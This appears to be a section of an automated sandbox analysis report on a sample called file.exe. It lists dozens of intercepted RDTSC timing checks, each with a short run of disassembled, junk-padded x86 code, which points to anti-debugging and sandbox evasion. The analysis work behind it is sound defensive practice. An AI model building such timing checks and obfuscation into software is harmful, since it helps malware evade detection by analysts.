              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C386 second address: 66C3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 ja 00007FBBF10EAAF6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007FBBF10EAAFDh 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push esi 0x0000001d jo 00007FBBF10EAAF6h 0x00000023 jmp 00007FBBF10EAAFBh 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366CE second address: 636712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBBF0D5FF56h 0x0000000a jmp 00007FBBF0D5FF5Bh 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 jmp 00007FBBF0D5FF69h 0x00000017 push edi 0x00000018 jmp 00007FBBF0D5FF5Eh 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636712 second address: 636718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674009 second address: 674010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674010 second address: 674030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBBF10EAAF6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jnc 00007FBBF10EAAF6h 0x00000017 pop edi 0x00000018 jl 00007FBBF10EAAFCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674162 second address: 674166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674166 second address: 67416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728C8 second address: 6728DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FBBF0D5FF58h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728DB second address: 6728E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6728E1 second address: 6728E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674237 second address: 67423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6743CC second address: 6743D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6743D4 second address: 6743E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B18 second address: 676B24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBBF0D5FF56h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B24 second address: 676B29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AE23 second address: 67AE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63BA30 second address: 63BA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63BA34 second address: 63BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF0D5FF5Dh 0x0000000f jc 00007FBBF0D5FF5Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5C8 second address: 67A5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5CE second address: 67A5F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007FBBF0D5FF56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e jmp 00007FBBF0D5FF64h 0x00000013 jl 00007FBBF0D5FF5Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AB6D second address: 67AB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBBF10EAAF6h 0x00000009 je 00007FBBF10EAAF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CFDA second address: 67CFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CFDE second address: 67CFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D118 second address: 67D11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D11D second address: 67D123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D24E second address: 67D254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D328 second address: 67D32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D32E second address: 67D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D8E8 second address: 67D952 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBF10EAAF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FBBF10EAB05h 0x00000010 xchg eax, ebx 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBBF10EAAF8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jns 00007FBBF10EAB0Bh 0x00000031 adc si, 18EDh 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jnc 00007FBBF10EAAF8h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DDBD second address: 67DDC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DDC3 second address: 67DDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DEDB second address: 67DEE5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBF0D5FF56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E3D9 second address: 67E3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E3DF second address: 67E3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FB9F second address: 67FBA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67EB0B second address: 67EB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F41C second address: 67F420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68069D second address: 6806D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007FBBF0D5FF5Ah 0x0000000c pop ebx 0x0000000d nop 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D2A1Eh], esi 0x00000016 mov edi, ebx 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D3086h], ecx 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jp 00007FBBF0D5FF56h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680434 second address: 680438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6806D2 second address: 6806D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681C4F second address: 681C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EAAFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680EC3 second address: 680EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681C60 second address: 681CA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBF10EAAF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D26DBh], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FBBF10EAAF8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D332Ah] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007FBBF10EAAF6h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680EC9 second address: 680ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681CA8 second address: 681CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681CAC second address: 681CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBF0D5FF5Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685A13 second address: 685A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBBF10EAAF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685A1D second address: 685A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686B14 second address: 686B1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686B1A second address: 686B24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBBF10EEF9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686BAC second address: 686BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686BB2 second address: 686BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688B74 second address: 688B7E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBF0522A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689D0A second address: 689D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FBBF10EEF9Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FBBF10EEF98h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, 146855D6h 0x0000002d push 00000000h 0x0000002f mov di, si 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FBBF10EEF98h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D2E9Bh], ebx 0x00000054 xchg eax, esi 0x00000055 push ecx 0x00000056 push ebx 0x00000057 pushad 0x00000058 popad 0x00000059 pop ebx 0x0000005a pop ecx 0x0000005b push eax 0x0000005c js 00007FBBF10EEFA8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jnc 00007FBBF10EEF96h 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685C26 second address: 685C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBBF0522A56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685CE6 second address: 685CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D07CB second address: 6D07DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF0522A60h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3D4C second address: 6D3D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D340A second address: 6D342C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A60h 0x00000007 jl 00007FBBF0522A58h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D342C second address: 6D3436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3436 second address: 6D3465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A63h 0x00000007 jmp 00007FBBF0522A62h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D35C1 second address: 6D35C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D35C7 second address: 6D35CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D372E second address: 6D373E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBF10EEF96h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D373E second address: 6D3742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3742 second address: 6D375D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBF10EEF9Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D375D second address: 6D3761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3761 second address: 6D3765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBCD6 second address: 6DBCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FBBF0522A56h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA571 second address: 6DA57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA57B second address: 6DA5A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF0522A64h 0x0000000f jmp 00007FBBF0522A5Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAB56 second address: 6DAB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAB5C second address: 6DAB79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 je 00007FBBF0522A5Ah 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FBBF0522A56h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB153 second address: 6DB15D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF10EEF96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB43C second address: 6DB446 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF0522A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB6C9 second address: 6DB6CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB6CF second address: 6DB6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBBF0522A56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB974 second address: 6DB9A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF10EEF9Fh 0x0000000f jmp 00007FBBF10EEFA9h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEE48 second address: 6DEE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A67h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEF93 second address: 6DEFC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FBBF10EEFA7h 0x0000000e jnl 00007FBBF10EEF96h 0x00000014 jno 00007FBBF10EEF96h 0x0000001a popad 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFC5 second address: 6DEFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFCB second address: 6DEFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFD5 second address: 6DEFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF29A second address: 6DF2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FBBF10EEF9Dh 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FBBF10EEF9Ah 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EFE91 second address: 6EFE95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0B1 second address: 6EE0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0C8 second address: 6EE0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0CC second address: 6EE0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0D0 second address: 6EE0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBBF0522A5Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0E5 second address: 6EE114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007FBBF10EEF98h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FBBF10EEFA9h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE114 second address: 6EE118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE3DF second address: 6EE3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE3E4 second address: 6EE3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
